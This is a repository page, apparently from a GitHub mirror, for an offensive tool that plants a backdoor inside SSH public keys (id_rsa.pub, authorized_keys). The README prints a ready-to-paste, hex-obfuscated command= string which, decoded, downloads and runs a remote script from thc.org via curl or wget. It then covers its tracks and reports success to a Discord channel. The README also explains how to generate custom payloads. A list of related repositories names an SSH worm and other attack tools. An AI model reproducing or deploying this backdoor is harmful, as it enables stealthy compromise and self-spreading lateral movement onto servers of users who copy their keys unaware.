hackerschoice/ssh-key-backdoor hackerschoice/ssh-key-backdoor

  • Stars
    star
    319
  • Rank 131,021 (Top 3 %)
  • Language
    Shell
  • Created over 1 year ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
hackerschoice/ssh-key-backdoor
github

hackerschoice

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

ssh-key-backdoor

This program generates a backdoor to hide inside an SSH public key (e.g. id_rsa.pub or authorized_keys). The backdoor will execute once when the user next logs in.

The objective is to use the ssh public key to move laterally within a target network. It exploits the fact that users copy their public ssh key to other servers without checking the content. Any server where their public key is copied will automatically get backdoored.

See https://blog.thc.org/infecting-ssh-public-keys-with-backdoors for details

Simply add the following backdoor-string to the beginning of the public key (id_rsa.pub or authorized_keys; up until, but not including, the ssh-ed255191 AAA...)

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....

This DEMO backdoor-string installs https://www.gsocket.io/deploy and reports the success back to our Discord channel.

Think of the ssh public key as a sort of ~/.bashrc but with your backdoor inside, that gets propagaded by the user to various servers, and when triggered sends a secret login code back to us.

Create your own backdoor-string by editing ssh-key-backdoor.sh (between ---BEGIN BACKDOOR--- and ---END BACKDOOR---) and execute:

# Set your own discord key or the results will be reported to our Discord channel. Please.
$ export KEY="1246565073951234567/mEDRabcdefghijklnopqrstuvwxzyABCDEahagasdKr7YQmA0Ej1-Ibdaytta_XGGq-n"
$ ./ssh-key-backdoor.sh

# Or view the clear commands without hex-encoding
$ ./ssh-key-backdoor.sh clear

(The same command=-trick can be used to trigger a canary or start other hidden services.)

This goes deep down the Bash rabbit hole...the curious reader may like to read our blog.

More Repositories

1

thc-tips-tricks-hacks-cheat-sheet

Various tips & tricks
Shell
2,930
star
2

gsocket

Connect like there is no firewall. Securely.
C
1,396
star
3

THC-Archive

All releases of the security research group (a.k.a. hackers) The Hacker's Choice
HTML
672
star
4

thc-tesla-powerwall2-hack

TESLA PowerWall 2 Security Shenanigans
458
star
5

segfault

Shell
325
star
6

bpfhacks

eBPF hacks
156
star
7

zapper

Zaps arguments and environment from the process list
C
134
star
8

CVE-2021-26855

PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github
Python
62
star
9

ttyinject

Get root via TTY / TIOCSTI stuffing
C
56
star
10

thc-btc-rng-bruteforce

C
49
star
11

ssh-it

Self replicating and automatically spreading SSH worm that recovers login credentials
C
37
star
12

erfs

Shell
36
star
13

thc-arpmitm

ARP Man-in-the-Middle tool
C
27
star
14

thc-rut

THC "R U There" network discovery tool
Objective-C
26
star
15

gs-transfer

Secure File Transfer via Global Socket Bounce Network
C
25
star
16

gsocket-relay

Global Socket Server
C
23
star
17

dsniff

C
22
star
18

docker-thc-hacker

Docker environment for hackers
Shell
14
star
19

iran-ssh-proxy

Docker Server Side for the Iran Proxy
Shell
13
star
20

binary

Binary and Static Releases
13
star
21

hackerschoice.github.io

The Hacker's Choice
12
star
22

kb

The Hacker's Choice Knowledge Base & Articles
11
star
23

docker-erfs-server

Shell
7
star
24

cryptostorm

CrytptoStorm.is WireGuard docker container
Shell
6
star
25

thc-art

Artistic work by THC
6
star
26

gsocket.io

Web pages for gsocket.io
4
star
27

mail

A Free Mail Forwarding Service
Perl
2
star
28

hackshell

Make BASH stealthy and hacker friendly with lots of bash functions
2
star
29

dnsgw

Go
2
star
30

thc-freezer-monitor

Raspberry Pi + MQTT + ThingSpeak +Β IFTTT
Python
1
star
31

memexec

Circumventing "noexec" mount flag to execute arbitrary linux binaries by ptrace-less process injection
PHP
1
star